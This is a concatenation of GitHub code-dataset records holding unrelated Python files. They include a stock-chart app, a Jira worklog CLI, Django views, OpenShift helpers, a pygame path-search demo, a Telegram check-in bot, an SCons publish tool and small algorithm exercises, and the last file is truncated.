selected_time_interval\n\n# Format the start_date as a string in 'YYYY-MM-DD' format\nstart_date_str = start_date.strftime('%Y-%m-%d')\n\nstarting_date = start_date_str\nend_date = today_date\n\nst.write('Your start date is', starting_date)\nst.write('Today\\'s date is', today_date)\n\n# Download stock data for the selected symbol and time interval\ndf = yf.download(stock_input, start=start_date, end=today_date)\n\nmoving_average_period = avg_input # Change to your desired moving average period\n\n# Download historical stock data using yfinance\nstock_data = yf.download(stock_input, start=start_date, end=end_date)\n\n# Calculate Simple Moving Average (SMA)\nstock_data['SMA'] = stock_data['Close'].rolling(window=moving_average_period).mean()\n\n# Calculate Exponential Moving Average (EMA)\nstock_data['EMA'] = stock_data['Close'].ewm(span=moving_average_period, adjust=False).mean()\n\n\n# Create a Matplotlib figure and axis\nfig, ax = plt.subplots(figsize=(12, 6))\n\n# Customize date formatting\ndate_format = DateFormatter(\"%Y-%m-%d\")\n\n# Plotting the stock data\nax.plot(df.index, stock_data['EMA'], label=f'EMA ({time_input})', color='blue')\nax.plot(df.index, df['Close'], label=f'Close ({time_input})', color='red')\nax.plot(df.index, stock_data['SMA'], label=f'SMA ({time_input})', color='black')\n\n# Adding labels and title\nax.set_ylabel('Price')\nax.set_title(f'Stock Price Over Time ({time_input})')\n\n# Customize date formatting for the x-axis\nax.xaxis.set_major_formatter(date_format)\n\n# Adding a legend\nax.legend()\n\n# Customize the x-axis label\nax.set_xlabel('Date')\n\n# Display the plot using Streamlit\nst.pyplot(fig)\n","repo_name":"Aniket-Patel-swg/TradeHelp","sub_path":"dfs.py","file_name":"dfs.py","file_ext":"py","file_size_in_byte":2905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33364899807","text":"# только для служебного пользования\n# самой классной командой в компании\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\n\nfrom jira.client import JIRA\nimport argparse\nimport click\nfrom datetime import datetime\n \n\n# Get key by meeting\ndef keyOfMeeting(meeting):\n\n if meeting == 'daily':\n return ['DRIVEN-3953']\n \n elif meeting == 'retro':\n return ['DRIVEN-3955']\n \n elif meeting == 'backlog':\n return ['DRIVEN-3952']\n \n elif meeting == 'other':\n return ['DRIVEN-3958']\n \n else:\n print (\"ERROR! You shoud choose right meeting name: daily, retro, backlog, other\")\n exit(1)\n\n# Initialize parser\nparser = argparse.ArgumentParser()\n\n\n# Adding required argument\nparser.add_argument(\"-l\", \"--Login\", help = \"Use your Jira login\", required=True)\nparser.add_argument(\"-p\", \"--Password\", help = \"Use your Jira password\", required=True)\nparser.add_argument(\"-t\", \"--Total\", help = \"Total hours you are spent on tasks, for e.g. 2 or 0.5\", required=True)\nparser.add_argument(\"-s\", \"--Started\", help=\"Moment when the work is logged (format: YYYY-MM-DD)\", required=False)\nparser.add_argument(\"-c\", \"--Comment\", help = \"Comment on log\", required=True)\nparser.add_argument(\"-k\", \"--Keys\", nargs='+', help = \"Keys of tasks, separated with spaces, you whant to log, for e.g. DRIVEN-4244 DRIVEN-4245\", required=False)\nparser.add_argument(\"-m\", \"--Meeting\", help = \"Meetings: daily, retro, backlog, other\", required=False)\n\n\n# Read arguments from command line\nargs = parser.parse_args()\n\n\n# Check what we have to deal with Meeting or Keys?\nif not args.Keys:\n if not args.Meeting:\n print (\"ERROR! You shoud choose -k keys or -m Meeting\")\n exit(1)\n else:\n keys = keyOfMeeting(args.Meeting)\nelse:\n keys = args.Keys\n\n# Convert the 'started' argument to a datetime object if provided\nstarted_datetime = None\nif args.Started:\n try:\n pre_started_datetime = args.Started + \"T00:00:00.000+0000\"\n started_datetime = datetime.strptime(pre_started_datetime, \"%Y-%m-%dT%H:%M:%S.000+0000\")\n except ValueError:\n print(\"ERROR! Invalid 'started' datetime format. Use the format: YYYY-MM-DDTHH:MM:SS.000+0000\")\n exit(1)\n\n# count worklog \ntime = float(args.Total)\ntimePart = round(time / len(keys), 2)\ntimePartText = '{}h'.format(timePart).replace('.',',')\n\n# Create client and connect to JIRA\njira_client = JIRA(options={'server':'https://jira.app.local','verify':False}, basic_auth=(args.Login, args.Password))\n\n# for nice output\nprint ('\\n')\n\n# Show issues to worklog\nfor issueKey in keys:\n issue = jira_client.issue(issueKey)\n print ('In issue {}: {} will be loged – {} hours'.format(issueKey, issue.fields.summary, timePartText))\n\n# for nice output\nprint ('\\n')\n\nif click.confirm('Do you want to continue?', default=False):\n print(\"Let's do this for you!\")\n # for nice output\n print ('\\n')\n\n for issueKey in keys:\n issue = jira_client.issue(issueKey)\n if started_datetime:\n jira_client.add_worklog(issue,timeSpent=timePartText,comment=args.Comment,started=started_datetime)\n else:\n jira_client.add_worklog(issue,timeSpent=timePartText,comment=args.Comment)\n print ('Logging in issue {} - DONE!'.format(issueKey))\n \n # for nice output\n print ('\\n')\n print(\"Have a nice day!\")\nelse:\n print ('\\n')\n print (\"Goodbye!\")\n\n","repo_name":"tiomat/smlab_worklog","sub_path":"worklog.py","file_name":"worklog.py","file_ext":"py","file_size_in_byte":3464,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"28302405884","text":"from django.shortcuts import render, get_object_or_404\nfrom subjects.models import Subject, SubjectVideo\nfrom subjects.filters import OrderFilter\n\n# Create your views here.\ndef subjectPage(request):\n allSubject = Subject.objects.all()\n\n # search filter = https://www.youtube.com/watch?v=G-Rct7Na0UQ\n Myfilter = OrderFilter(request.GET,queryset=allSubject)\n allSubject = Myfilter.qs\n\n context = {\n 'subject':allSubject,\n 'filterSub':Myfilter,\n }\n return render(request,'subjects/subject.html',context)\n\ndef messagePage(request):\n return render(request,'subjects/message.html')\n\ndef videoPage(request,id):\n video = get_object_or_404(SubjectVideo, pk=id)\n context = {\n 'video':video,\n }\n\n return render(request, \"subjects/video.html\", context)","repo_name":"Rohitupe/E-Learning","sub_path":"Django - APP/subjects/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13344348758","text":"from urllib import request\n\n# 定义一个代理信息\n# 免费代理\n# proxy = {\n# 'http' : 'http://120.9.79.227:9999',\n# 'https' : 'http://120.9.79.227:9999',\n# }\n\n# 认证代理\nproxy = {\n 'http' : 'http://alice:123456@120.78.166.84:6666',\n 'https' : 'http://alice:123456@120.78.166.84:6666'\n}\n\n# 代理管理器\nproxy_handler = request.ProxyHandler(proxy)\nopener = request.build_opener(proxy_handler)\n\nresponse = opener.open('http://www.baidu.com/s?wd=ip')\n\nprint(response.read().decode('utf-8'))","repo_name":"Ran-oops/python_notes2","sub_path":"9/认识爬虫-课件-v1/Py爬虫课件/1-09爬虫代码/spider_day4/2.proxy_demo.py","file_name":"2.proxy_demo.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"6016969078","text":"import logging\n\nfrom thoth.common import OpenShift\n\nfrom .configuration import Configuration\n\n_LOGGER = logging.getLogger(__name__)\n\n\ndef create_inspect_imagestream(openshift: OpenShift, inspection_id: str) -> str:\n \"\"\"Dynamically create imagestream on user request.\"\"\"\n response = openshift.ocp_client.resources.get(api_version='v1', kind='Template').get(\n namespace=Configuration.AMUN_INFRA_NAMESPACE,\n label_selector='template=amun-inspect-imagestream'\n )\n\n openshift._raise_on_invalid_response_size(response)\n\n response = response.to_dict()\n _LOGGER.debug(\"OpenShift response for getting Amun inspect ImageStream template: %r\", response)\n template = response['items'][0]\n\n openshift.set_template_parameters(template, AMUN_INSPECTION_ID=inspection_id)\n template = openshift.oc_process(Configuration.AMUN_INSPECTION_NAMESPACE, template)\n imagestream = template['objects'][0]\n\n response = openshift.ocp_client.resources.get(api_version='v1', kind=imagestream['kind']).create(\n body=imagestream,\n namespace=Configuration.AMUN_INSPECTION_NAMESPACE\n )\n\n response = response.to_dict()\n _LOGGER.debug(\"OpenShift response for creating Amun ImageStream: %r\", response)\n\n return response['metadata']['name']\n\n\ndef create_inspect_buildconfig(openshift: OpenShift, inspection_id: str, dockerfile: str) -> None:\n \"\"\"Create build config for the given image stream.\"\"\"\n response = openshift.ocp_client.resources.get(api_version='v1', kind='Template').get(\n namespace=Configuration.AMUN_INFRA_NAMESPACE,\n label_selector='template=amun-inspect-buildconfig'\n )\n\n openshift._raise_on_invalid_response_size(response)\n response = response.to_dict()\n _LOGGER.debug(\"OpenShift response for getting Amun inspect BuildConfig template: %r\", response)\n\n template = response['items'][0]\n openshift.set_template_parameters(\n template,\n AMUN_INSPECTION_ID=inspection_id,\n AMUN_GENERATED_DOCKERFILE=dockerfile\n )\n\n template = openshift.oc_process(Configuration.AMUN_INSPECTION_NAMESPACE, template)\n buildconfig = template['objects'][0]\n\n response = openshift.ocp_client.resources.get(api_version='v1', kind=buildconfig['kind']).create(\n body=buildconfig,\n namespace=Configuration.AMUN_INSPECTION_NAMESPACE\n )\n\n _LOGGER.debug(\"OpenShift response for creating Amun BuildConfig: %r\", response.to_dict())\n\n\ndef create_inspect_job(openshift: OpenShift, image_stream_name: str) -> None:\n \"\"\"Create the actual inspect job.\"\"\"\n response = openshift.ocp_client.resources.get(api_version='v1', kind='Template').get(\n namespace=Configuration.AMUN_INFRA_NAMESPACE,\n label_selector='template=amun-inspect-job'\n )\n\n openshift._raise_on_invalid_response_size(response)\n response = response.to_dict()\n _LOGGER.debug(\"OpenShift response for getting Amun inspect Job template: %r\", response)\n\n template = response['items'][0]\n openshift.set_template_parameters(template, AMUN_INSPECTION_ID=image_stream_name)\n\n template = openshift.oc_process(Configuration.AMUN_INSPECTION_NAMESPACE, template)\n job = template['objects'][0]\n\n response = openshift.ocp_client.resources.get(api_version='v1', kind=job['kind']).create(\n body=job,\n namespace=Configuration.AMUN_INSPECTION_NAMESPACE\n )\n\n _LOGGER.debug(\"OpenShift response for creating Amun Job: %r\", response.to_dict())\n","repo_name":"ace2107/amun-api","sub_path":"amun/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":3450,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"33426562681","text":"def solution(numbers, hand):\n number_list = [[1, 2, 3], [4, 5, 6], [7, 8, 9], ['*', 0, '#']]\n left_i, left_j = 3, 0\n right_i, right_j = 3, 2\n answer = ''\n for num in numbers:\n for i in range(len(number_list)):\n if num in number_list[i]:\n num_i = i\n break\n if num in [2, 5, 8, 0]:\n num_j = number_list[i].index(num)\n left_sum = abs(left_i - num_i) + abs(left_j - num_j)\n right_sum = abs(right_i - num_i) + abs(right_j - num_j)\n if left_sum > right_sum:\n right_i, right_j = num_i, num_j\n answer += 'R'\n elif left_sum < right_sum:\n left_i, left_j = num_i, num_j\n answer += 'L'\n else:\n if hand == \"right\":\n right_i, right_j = num_i, num_j\n answer += 'R'\n else:\n left_i, left_j = num_i, num_j\n answer += 'L'\n elif num in [1, 4, 7, '*']:\n left_i, left_j = num_i, 0\n answer += 'L'\n else:\n right_i, right_j = num_i, 2\n answer +='R'\n return answer","repo_name":"bigleaderman/algorithm_study","sub_path":"알고리즘/프로그래머스/2210/1025/programers_kakao_keypad.py","file_name":"programers_kakao_keypad.py","file_ext":"py","file_size_in_byte":1213,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"39126965799","text":"'''\r\nDjisktra's shortest path algorithm using pygame\r\n'''\r\nfrom tkinter import messagebox, Tk\r\nimport pygame\r\nimport sys\r\n#variable declerations\r\nwindow_width = 800\r\nwindow_height = 600\r\ncols = 50\r\nrows = 50\r\nbox_width = window_width // cols\r\nbox_height = window_height // rows\r\ngrid = []\r\nqueue = []\r\npath = []\r\nwindow = pygame.display.set_mode((window_width,window_height))\r\n\r\nclass Box:\r\n def __init__(self,i, j):\r\n self.x = i\r\n self.y = j\r\n self.startPos = False # define start marker box\r\n self.wall = False # define wall markers box\r\n self.target = False # define destination marker box\r\n self.queued = False\r\n self.visted = False\r\n self.neighbours = []\r\n self.prior = None\r\n\r\n def draw(self, win, color):\r\n pygame.draw.rect(win, color, (self.x * box_width, self.y * box_height, box_width - 2, box_height - 2)) # -2 pixel allows to draw boarders\r\n\r\n def set_neighbours(self):\r\n if self.x > 0:\r\n self.neighbours.append(grid[self.x - 1][self.y])\r\n if self.x < cols - 1:\r\n self.neighbours.append(grid[self.x + 1][self.y])\r\n if self.y > 0:\r\n self.neighbours.append(grid[self.x][self.y - 1])\r\n if self.y < rows - 1:\r\n self.neighbours.append(grid[self.x][self.y + 1])\r\n\r\n\r\n#initializing grid\r\nfor i in range(cols):\r\n array = []\r\n for j in range(rows):\r\n array.append(Box(i,j))\r\n grid.append(array)\r\n\r\nfor i in range(cols):\r\n for j in range(rows):\r\n grid[i][j].set_neighbours()\r\nstart_box = grid[0][0]\r\nstart_box.startPos = True\r\nstart_box.visted = True\r\nqueue.append(start_box)\r\ndef main():\r\n begin_search = False #algorthim trigger\r\n target_box_set = False # endpoint of search\r\n searching = True\r\n target_box = None\r\n while True:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n pygame.quit()\r\n sys.exit()\r\n elif event.type == pygame.MOUSEMOTION:\r\n x = pygame.mouse.get_pos()[0]\r\n y = pygame.mouse.get_pos()[1]\r\n #Draw obstacle Wall\r\n if event.buttons[0]: #left mouse button pressed\r\n i = x // box_width\r\n j = y // box_height\r\n grid[i][j].wall = True\r\n\r\n # Final destination\r\n if event.buttons[2] and not target_box_set: #right mouse button pressed\r\n i = x // box_width\r\n j = y // box_height\r\n target_box = grid[i][j]\r\n target_box.target = True\r\n target_box_set = True\r\n if event.type == pygame.KEYDOWN and target_box_set:\r\n begin_search = True\r\n if begin_search:\r\n if len(queue) > 0 and searching:\r\n current_box = queue.pop(0)\r\n current_box.visted = True\r\n if current_box == target_box:\r\n searching = False\r\n while current_box.prior != start_box:\r\n path.append(current_box.prior)\r\n current_box = current_box.prior\r\n else:\r\n for neighbour in current_box.neighbours:\r\n if not neighbour.queued and not neighbour.wall:\r\n neighbour.queued = True\r\n neighbour.prior = current_box\r\n queue.append(neighbour)\r\n else:\r\n if searching:\r\n Tk().wm_withdraw()\r\n messagebox.showinfo(\"no solution\", \"no possible path\")\r\n searching = False\r\n\r\n window.fill((0, 0, 0))\r\n for i in range(cols):\r\n for j in range(rows):\r\n box = grid[i][j]\r\n box.draw(window, (20,20,20))\r\n\r\n if box.queued:\r\n box.draw(window, (200, 0, 0))\r\n if box.visted:\r\n box.draw(window, (0, 200, 0))\r\n if box.startPos:\r\n box.draw(window, (0, 200, 200))\r\n if box in path:\r\n box.draw(window, (0, 0, 200))\r\n if box.wall:\r\n box.draw(window, (90, 90, 90))\r\n if box.target:\r\n box.draw(window, (200, 200, 0))\r\n pygame.display.flip()\r\nmain()\r\n","repo_name":"zainshahzad745/djisktra-akgorithm","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4458,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33036561190","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 17 18:19:42 2017\n\n@author: ralall\n\"\"\"\nimport matplotlib.pyplot as plt\nfrom sklearn import linear_model\n\n\n\n\ndef line(d):\n plt.scatter(d[\"days\"],d[\"energy\"],color='black')\n plt.xlabel(\"days\")\n plt.ylabel(\"energy\")\n reg=linear_model.LinearRegression()\n reg.fit(d[\"days\"],d[\"energy\"])\n m=reg.coef_[0]\n b=reg.intercept_\n print(\"slope=\",m, \"intercept=\",b)\n plt.scatter(d[\"days\"],d[\"energy\"],color='black')\n predicted_values = [reg.coef_ * i + reg.intercept_ for i in d[\"days\"]]\n plt.plot(d[\"days\"], predicted_values, 'b')\n plt.xlabel(\"days\")\n plt.ylabel(\"energy\")","repo_name":"Nimitkothari/Analytics","sub_path":"Python-anlytics/skline.py","file_name":"skline.py","file_ext":"py","file_size_in_byte":643,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"33434775251","text":"def module_Sum(arr,n,m):\r\n\r\n if (n > m):\r\n return True #Ensures that list of number or added numbers within 'n' are larger than 'm', otherwise 'm' would be out of range for division.\r\n\r\n DP = [False for i in range(m)] #Initalizes an array as false\r\n\r\n for i in range(n):\r\n if (DP[0]):\r\n return True # If 'n' list of number or numbers can be divided by m, the program is done\r\n\r\n temp = [False for i in range(m)] # 'temp' is used to deal with any new additional figures added to the set if DP[J] was true beforehand\r\n\r\n for j in range(m):\r\n if DP[j] == True:\r\n if DP [(j + arr[i]) % m] == False:\r\n temp[(j + arr[i]) % m] = True\r\n\r\n for j in range(m):\r\n if (temp[j]):\r\n DP[j] = True\r\n\r\n #DP[arr[i] % m] = True \r\n return DP[0]\r\n\r\narr = [6,9,12, 24]\r\nn = len(arr)\r\nm = 3\r\n\r\nif (module_Sum(arr,n,m)):\r\n print(\"Yes, m is divisible.\")\r\n\r\nelse:\r\n print(\"No, m is not divisible\")\r\n","repo_name":"MMGit64/Dynamic-programming","sub_path":"DynamicProgramming.py","file_name":"DynamicProgramming.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8547941655","text":"import asyncio\nimport random\nfrom pyrogram.types import Message\nfrom thefuzz import process\n\nfrom ...data import get_data\nfrom .base import AnswerBotCheckin\n\n\nclass JMSCheckin(AnswerBotCheckin):\n ocr = \"idioms@v2\"\n idioms = None\n lock = asyncio.Lock()\n\n name = \"卷毛鼠\"\n bot_username = \"jmsembybot\"\n\n async def start(self):\n self.retries = 2\n async with self.lock:\n if self.idioms is None:\n file = await get_data(self.basedir, \"idioms@v1.txt\", proxy=self.proxy, caller=self.name)\n if not file:\n raise FileNotFoundError(\"无法下载所需数据文件\")\n with open(file, encoding=\"utf-8\") as f:\n self.__class__.idioms = [i for i in f.read().splitlines() if len(i) == 4]\n return await super().start()\n\n def to_idiom(self, captcha: str):\n phrase, score = process.extractOne(captcha, self.idioms)\n if score > 70 or len(captcha) < 4:\n result = phrase\n self.log.debug(f'[gray50]已匹配识别验证码 \"{captcha}\" -> ���语 \"{result}\".[/]')\n else:\n result = captcha\n self.log.debug(f'[gray50]验证码 \"{captcha}\" 无法矫正, 使用原词.[/]')\n return result\n\n async def on_captcha(self, message: Message, captcha: str):\n captcha = self.to_idiom(captcha)\n async with self.operable:\n if not self.message:\n await self.operable.wait()\n await asyncio.sleep(random.uniform(3, 5))\n for l in captcha:\n try:\n await self.message.click(l)\n await asyncio.sleep(random.uniform(3, 5))\n except ValueError:\n self.log.info(f'未能找到对应 \"{l}\" 的按键, 正在重试.')\n await self.retry()\n break\n","repo_name":"embykeeper/embykeeper","sub_path":"embykeeper/telechecker/bots/jms.py","file_name":"jms.py","file_ext":"py","file_size_in_byte":1887,"program_lang":"python","lang":"en","doc_type":"code","stars":203,"dataset":"github-code","pt":"52"} +{"seq_id":"38833290434","text":"#!/usr/bin/env python\n\nimport argparse\nfrom argparse import ArgumentParser\nfrom csv import reader, writer\nfrom sys import stdout\n\ndef join_arg(string):\n try:\n (table,left_key, right_key) = string.split(\":\")\n table = str(table)\n left_key = int(left_key)\n right_key = int(right_key)\n except Exception:\n raise argparse.ArgumentTypeError(\"format is file:left_key:right_key\")\n else:\n return (table,left_key, right_key)\n\n# fileA fileB keyA keyB fileC keyC keyD\nparser = ArgumentParser()\nparser.add_argument(\"base\", help=\"table to start with\")\nparser.add_argument(\"join_arg\", type=join_arg, nargs='+', help=\"file.csv:left_key_index:right_key_index\")\n\ndef create_table(f):\n r = reader(f)\n table = []\n for record in r:\n table.append(record)\n return table\n\ndef create_table_with_index(f, key_index):\n table = create_table(f)\n index = {}\n for record in table:\n key = record[key_index]\n index[key] = record\n return index\n\n\ndef main():\n args = parser.parse_args()\n with open(args.base, 'r') as accum_f:\n accum = create_table(accum_f)\n for (table_name,left_index,right_index) in args.join_arg:\n with open(table_name, 'r') as f:\n table = create_table_with_index(f, right_index)\n for record in accum:\n accum_key = record[left_index]\n right_record = table[accum_key]\n before = right_record[:right_index]\n after = right_record[(right_index+1):]\n record.extend(before+after)\n out = writer(stdout)\n for record in accum:\n out.writerow(map(str, record))\n\nif __name__ == '__main__':\n main()\n","repo_name":"andrewguy9/onevsall","sub_path":"join_csv.py","file_name":"join_csv.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"13019439975","text":"__published = {}\n\n#------------------------------------------------------------------------------\n\n\nclass PublishItem(object):\n \"\"\"Item to be published.\"\"\"\n\n def __init__(self, source, subdir):\n \"\"\"Initialize object.\n\n Args:\n source: Source node.\n subdir: If not None, subdirectory to copy node into in\n ReplicatePublished().\n \"\"\"\n object.__init__(self)\n self.source = source\n self.subdir = subdir\n\n#------------------------------------------------------------------------------\n\n\ndef _InitializePublish(env):\n \"\"\"Re-initializes published resources.\n\n Args:\n env: Parent environment\n \"\"\"\n env=env # Silence gpylint\n\n # Clear the dict of published resources\n __published.clear()\n\n\ndef ReplicatePublished(self, target, group_name, resource_type):\n \"\"\"Replicate published resources for the group to the target directory.\n\n Args:\n self: Environment in which this function was called.\n target: Target directory for resources.\n group_name: Name of resource group, or a list of names of resource groups.\n resource_type: Type of resources (string), or a list of resource types.\n\n Uses the subdir parameter passed to Publish() when replicating source nodes\n to the target.\n\n Returns:\n The list of target nodes from the calls to Replicate().\n\n Since this is based on Replicate(), it will also use the REPLICATE_REPLACE\n variable, if it's set in the calling environment.\n \"\"\"\n target_path = self.Dir(target).abspath\n #GOOGLE_CHANGE(pss) - FROM THIS:\n #GOOGLE_CHANGE(pss) - TO THIS:\n source_list = self.GetPublishedWithSubdirs(group_name, resource_type)\n #GOOGLE_CHANGE(pss) - END CHANGES\n dest_nodes = []\n #GOOGLE_CHANGE(pss) - FROM THIS:\n # for group in self.SubstList2(group_name):\n # for resource in self.SubstList2(resource_type):\n # # Get items for publish group and resource type\n # items = __published.get(group, {}).get(resource, [])\n # for i in items:\n # if i.subdir:\n # dest_nodes += self.Replicate(target_path + '/' + i.subdir, i.source)\n # else:\n # dest_nodes += self.Replicate(target_path, i.source)\n #GOOGLE_CHANGE(pss) - TO THIS:\n for source in source_list:\n # Add the subdir if there is one in the source tuple.\n if source[1]:\n dest_nodes += self.Replicate(target_path + '/' + source[1], source[0])\n else:\n dest_nodes += self.Replicate(target_path, source[0])\n #GOOGLE_CHANGE(pss) - END CHANGES\n return dest_nodes\n\n\n#GOOGLE_CHANGE(pss) - FROM THIS:\n# def GetPublished(self, group_name, resource_type):\n# \"\"\"Returns a list of the published resources of the specified type.\n#\n# Args:\n# self: Environment in which this function was called.\n# group_name: Name of resource group, or a list of names of resource groups.\n# resource_type: Type of resources (string), or a list of resource types.\n#\n# Returns:\n# A flattened list of the source nodes from calls to Publish() for the\n# specified group and resource type. Returns an empty list if there are\n# no matching resources.\n# \"\"\"\n#GOOGLE_CHANGE(pss) - TO THIS:\ndef GetPublishedWithSubdirs(self, group_name, resource_type):\n \"\"\"Returns a list of the published resources of the specified type.\n\n Args:\n self: Environment in which this function was called.\n group_name: Name of resource group, or a list of names of resource groups.\n resource_type: Type of resources (string), or a list of resource types.\n\n Returns:\n A flattened list of the source nodes from calls to Publish() for the\n specified group and resource type. Each source node is represented\n by a pair consisting of (source_node, subdir). Returns an empty list\n if there are no matching resources.\n \"\"\"\n#GOOGLE_CHANGE(pss) - END CHANGES\n source_list = []\n for group in self.SubstList2(group_name):\n # Get items for publish group and resource type\n for resource in self.SubstList2(resource_type):\n items = __published.get(group, {}).get(resource, [])\n for i in items:\n #GOOGLE_CHANGE(pss) - FROM THIS:\n # source_list.append(i.source)\n #GOOGLE_CHANGE(pss) - TO THIS:\n source_list.append((i.source, i.subdir))\n #GOOGLE_CHANGE(pss) - END CHANGES\n\n return source_list\n\n\n#GOOGLE_CHANGE(pss) - FROM THIS:\n#GOOGLE_CHANGE(pss) - TO THIS:\ndef GetPublished(self, group_name, resource_type):\n \"\"\"Returns a list of the published resources of the specified type.\n\n Args:\n self: Environment in which this function was called.\n group_name: Name of resource group, or a list of names of resource groups.\n resource_type: Type of resources (string), or a list of resource types.\n\n Returns:\n A flattened list of the source nodes from calls to Publish() for the\n specified group and resource type. Returns an empty list if there are\n no matching resources.\n \"\"\"\n source_list = self.GetPublishedWithSubdirs(group_name, resource_type)\n return [source[0] for source in source_list]\n\n\n#GOOGLE_CHANGE(pss) - END CHANGES\ndef Publish(self, group_name, resource_type, source, subdir=None):\n \"\"\"Publishes resources for use by other scripts.\n\n Args:\n self: Environment in which this function was called.\n group_name: Name of resource group.\n resource_type: Type of resources (string).\n source: Source file(s) to copy. May be a string, Node, or a list of\n mixed strings or Nodes. Strings will be passed through env.Glob() to\n evaluate wildcards. If a source evaluates to a directory, the entire\n directory will be recursively copied.\n subdir: Subdirectory to which the resources should be copied, relative to\n the primary directory for that resource type, if not None.\n \"\"\"\n if subdir is None:\n subdir = '' # Make string so we can append to it\n\n # Evaluate SCons variables in group name\n # TODO: Should Publish() be able to take a list of group names and publish\n # the resource to all of them?\n group_name = self.subst(group_name)\n\n # Get list of sources\n items = []\n for source_entry in self.Flatten(source):\n if isinstance(source_entry, str):\n # Search for matches for each source entry\n # TODO: Should generate an error if there were no matches? But need to\n # skip this warning if this is a recursive call to self.Publish() from\n # below.\n source_nodes = self.Glob(source_entry)\n else:\n # Source entry is already a file or directory node; no need to glob it\n source_nodes = [source_entry]\n for s in source_nodes:\n if str(s.__class__) == 'SCons.Node.FS.Dir':\n # Recursively publish all files in subdirectory. Since glob('*')\n # doesn't match dot files, also glob('.*').\n self.Publish(group_name, resource_type,\n [s.abspath + '/*', s.abspath + '/.*'],\n subdir=subdir + '/' + s.name)\n else:\n items.append(PublishItem(s, subdir))\n\n # Publish items, if any\n if items:\n # Get publish group\n if group_name not in __published:\n __published[group_name] = {}\n group = __published[group_name]\n if resource_type not in group:\n group[resource_type] = []\n\n # Publish items into group\n group[resource_type] += items\n\n\ndef generate(env):\n # NOTE: SCons requires the use of this name, which fails gpylint.\n \"\"\"SCons entry point for this tool.\"\"\"\n\n # Defer initializing publish, but do before building SConscripts\n env.Defer(_InitializePublish)\n env.Defer('BuildEnvironmentSConscripts', after=_InitializePublish)\n\n #GOOGLE_CHANGE(pss) - FROM THIS:\n #GOOGLE_CHANGE(pss) - TO THIS:\n env.AddMethod(GetPublishedWithSubdirs)\n #GOOGLE_CHANGE(pss) - END CHANGES\n env.AddMethod(GetPublished)\n env.AddMethod(Publish)\n env.AddMethod(ReplicatePublished)\n","repo_name":"kiwibrowser/src","sub_path":"native_client/site_scons/site_tools/publish.py","file_name":"publish.py","file_ext":"py","file_size_in_byte":7769,"program_lang":"python","lang":"en","doc_type":"code","stars":2475,"dataset":"github-code","pt":"52"} +{"seq_id":"4384432377","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# __author__ hsz\n\n\"\"\"\n协程介绍之 从生成器开始\n\n\n\"\"\"\n\n\ndef gen_func():\n # 下面的一行代码的作用为:\n # 1.产出值 2.可以接收值(调用方传递进来的值)\n html = yield \"www.baidu.com\"\n print(html)\n yield 2\n yield 3\n return \"hsz\"\n\n# 1. 生成器不只,可以产出值,还可以接收值\n\n\n\nif __name__ == \"__main__\":\n gen = gen_func()\n # 1. 启动生成器有两种 next() , send\n # (1)方式一\n # url = next(gen)\n # (2)方式二 : 必须 是None\n gen.send(None)\n # 模拟download url\n zz = \"hsz\"\n # gen.send(zz) # send方法可以传递值进入生成器内部,同时还可以重启执行到下一个yield的位置\n print(gen.send(zz)) # 注释上面一行改为打印这个send ,打印结果为 2\n\n # print(next(gen))\n # print(next(gen))\n # print(next(gen))\n # print(next(gen)) 没有yield 的话会报错\n","repo_name":"Thousandhack/reading_notes_python","sub_path":"advanced_python/065_gen_send.py","file_name":"065_gen_send.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"11506083550","text":"\"\"\"\n Given a list of words and two words word1 and word2, return the shortest distance between these two words in the list.\n\n word1 and word2 may be the same and they represent two individual words in the list.\n\n Example:\n Assume that words = [\"practice\", \"makes\", \"perfect\", \"coding\", \"makes\"].\n\n Input: word1 = “makes”, word2 = “coding”\n Output: 1\n Input: word1 = \"makes\", word2 = \"makes\"\n Output: 3\n Note:\n You may assume word1 and word2 are both in the list.\n\"\"\"\nclass Solution:\n def shortestWordDistance(self, words: List[str], word1: str, word2: str) -> int:\n idx1, idx2 = len(words), len(words)\n res = len(words)\n sameflag = word1 == word2\n \n for i, v in enumerate(words):\n if v == word1:\n idx1 = i\n res = min(res, abs(idx1 - idx2))\n if sameflag:\n idx2 = idx1\n elif v == word2 and not sameflag:\n idx2 = i\n res = min(res, abs(idx1 - idx2))\n \n return res\n","repo_name":"NiuNiu-jupiter/Leetcode","sub_path":"Premuim/245. Shortest Word Distance III.py","file_name":"245. Shortest Word Distance III.py","file_ext":"py","file_size_in_byte":1024,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"5737671670","text":"import TileHandling\nimport SatmapFormat\nimport sys\nimport math\nimport osm_adaptor\nimport io\nimport re\nimport os\nimport os.path\nimport datetime\nfrom PIL import Image\nfrom concurrent.futures import ThreadPoolExecutor\n\ndef help():\n print(\"Usage: %s [-maxscale=] [-poi=,] [-ignorescales=,,,...] [-d] [-list_contents] [-select_content=] \" % os.path.basename(sys.argv[0]))\n os._exit(1)\n \nif __name__ == 